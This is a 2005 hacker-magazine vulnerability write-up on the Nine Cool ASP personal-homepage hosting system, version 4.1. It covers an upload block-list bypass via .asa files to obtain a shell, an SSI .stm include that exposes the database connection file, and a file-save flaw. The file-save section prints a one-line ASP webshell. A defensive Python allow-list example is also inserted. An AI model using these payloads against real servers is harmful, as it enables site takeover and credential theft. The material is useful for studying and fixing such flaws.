A further exploration of the Nine Cool network personal homepage space management system: vulnerability research

Source: Internet
Author: User
Author of this article: Hyun-Cat [b.c.t]
This article was originally published in "Hacker X-Files" 2005 issue 7; it first appeared online at b.c.t (http://www.cnbct.org/showarticle.asp?id=495) and Black Forest (http://www.blackwoosd.cn).
Copyright of this article belongs to "Hacker X-Files" magazine and the author.
--------------------------------------------------------------------------------

Hyun-Cat published a vulnerability study of the Nine Cool network personal homepage space management system ("Nine Cool") in the 2004 issue 12 (see "Easily Break the Free Space Limit" in that issue). The version then was 3.0. Recently I obtained the 4.1 free edition of Nine Cool; the official notes say many holes were fixed, but I have always felt that a simple ASP program is hard to make both efficient and safe for managing free web space, so I gave this program a quick security review. The result was a number of high-risk vulnerabilities, most of which directly threaten the administrator or other users, and some of which even endanger the server. Let's look at these vulnerabilities one by one:

1. Upload vulnerability

The program's author made an easily overlooked mistake: the backend management configures only which file types are "blocked" from upload, rather than which types are "allowed", so some of the most dangerous extensions are easy to miss.

Look at the upload interface and select an ASP file to upload: the program reports that the extension is illegal. Change the extension to .asa and upload again: success, and you get a shell.

But luck does not always hold. What if an experienced administrator has already removed the asp.dll mapping for .asa, .cer and similar extensions? Then SSI can still be used to obtain sensitive information.

What is SSI? SSI stands for Server Side Include: the server includes one file inside another, and on IIS the inclusion is handled by ssinc.dll. The <!--#include file="conn.asp"--> directive that we commonly use in ASP is one application of SSI.

Write a file locally with the content <!--#include file="inc/conn.asp"-->, save it as look.stm, upload it to the server, then request that file and view its source: the contents of the program's database connection file are shown. This system does not protect its database against download, so it can be downloaded directly. One note: if the file name contains special characters, use an ASCII (URL-encoding) converter to build the correct address.
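To make the block-list versus allow-list point concrete, here is an added example (not code from the Nine Cool program, which is written in ASP): a deny-list check of the kind described above lets the .asa and .stm names from this section through, while an allow-list check rejects them. The extension sets are constructed for this example, not taken from the program's configuration.

```python
import posixpath

# Constructed stand-in for the "deny dangerous types" configuration the
# article describes; the real 4.1 block list is not given on the page.
BLOCKED_EXTENSIONS = {"asp", "aspx", "exe", "com", "bat"}

# Constructed allow list of the types a personal-homepage host actually
# needs: everything else is refused, so a forgotten mapping cannot hurt.
ALLOWED_EXTENSIONS = {"htm", "html", "txt", "jpg", "jpeg", "gif", "png", "css"}


def _extensions(filename: str) -> list:
    """Return every extension segment of the base name, lower-cased.

    'look.stm' -> ['stm'], 'page.asp.jpg' -> ['asp', 'jpg'], 'README' -> [].
    Path separators and trailing dots are normalised first, since Windows
    drops a trailing dot when the file is created on disk.
    """
    base = posixpath.basename(filename.replace("\\", "/")).strip().rstrip(".")
    parts = base.lower().split(".")
    return parts[1:] if len(parts) > 1 else []


def blocklist_allows(filename: str) -> bool:
    """The weak rule: reject only the listed types.

    Anything the author forgot to list (.asa, .cer, .stm handled by
    asp.dll / ssinc.dll on IIS) is accepted, and only the last segment
    is examined.
    """
    exts = _extensions(filename)
    return bool(exts) and exts[-1] not in BLOCKED_EXTENSIONS


def allowlist_allows(filename: str) -> bool:
    """Hardened rule: accept only listed types, and require every
    extension segment to be listed so 'x.asp.jpg' is refused as well."""
    exts = _extensions(filename)
    return bool(exts) and all(e in ALLOWED_EXTENSIONS for e in exts)
```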

There is one more upload issue: this system uses the 5xsoft general-purpose (component-free) upload class, which carries that class's own old upload vulnerability. The bug is very old, and I leave it for readers to try themselves.

2. File-save vulnerability

The new Nine Cool 4.1 performs proper permission checks when reading directories, reading files and deleting: changing the parameters directly produces a "no permission" error, and when a file is renamed the program likewise checks that the new name is not a dangerous type.

After testing, Hyun-Cat found a small hole in the file edit/save module: a file can be successfully saved with the .asp extension. The program does inspect the file contents, and some dangerous strings cannot be used, but a one-line trojan can be written into the file: <%execute request("value")%>. Hyun-Cat's improved one-line trojan client can then be used to write a new file.
